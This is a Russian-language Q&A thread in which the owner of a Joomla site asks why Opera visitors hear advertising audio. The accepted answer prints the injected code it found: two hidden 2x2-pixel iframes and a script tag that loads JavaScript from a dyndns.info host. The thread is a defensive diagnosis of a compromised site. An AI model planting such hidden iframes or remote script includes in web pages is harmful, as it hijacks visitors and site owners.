# Найти источник звука на странице в браузере Opera

Tags: html, joomla, поиск, opera

Суть в том что на сайте под управлением Joomla 1.5.25 где то стоит код, который (как я полагаю) определяет использование браузера Опера и запускает проигрывание рекламы, до того ещё было перенаправление на сторонний сайт (только для opera), но заменив счётчик яндекса перенаправление изчезло.

Вот мой сайт www.superzagar.ru

К стати в моей опере он криво открывается но у других всё нормально. У меня

Opera:
12.15 
Сборка:
1748 
Платформа:
Linux 
Система:
x86_64, 3.8.0-19-generic

Answer (score 1, accepted):

какие то два странных iframe  с ссылкой на megogo

```
<iframe width=2 height=2 frameborder=0 src=http://megogo.net/ru/view/6545-ilya-muromec-i-solovey-razboynik.html?utm_source=inform_Ru=MGG ></iframe><iframe width=2 height=2 frameborder=0 src=http://weekend-in-ua.blogspot.com/p/blog-page_9166.html></iframe>
```

А грузиться он по ссылке `http://w99cw96q95.dyndns.info/statn.php?i=24361`

Ищите у себя, кто вставляет

```
<nofollow><script language='JavaScript' src=http://w99cw96q95.dyndns.info/infon.php?i=24361></script>
```

Comment: Благодарю, походу старый админ шалит, надо пароли поменять :)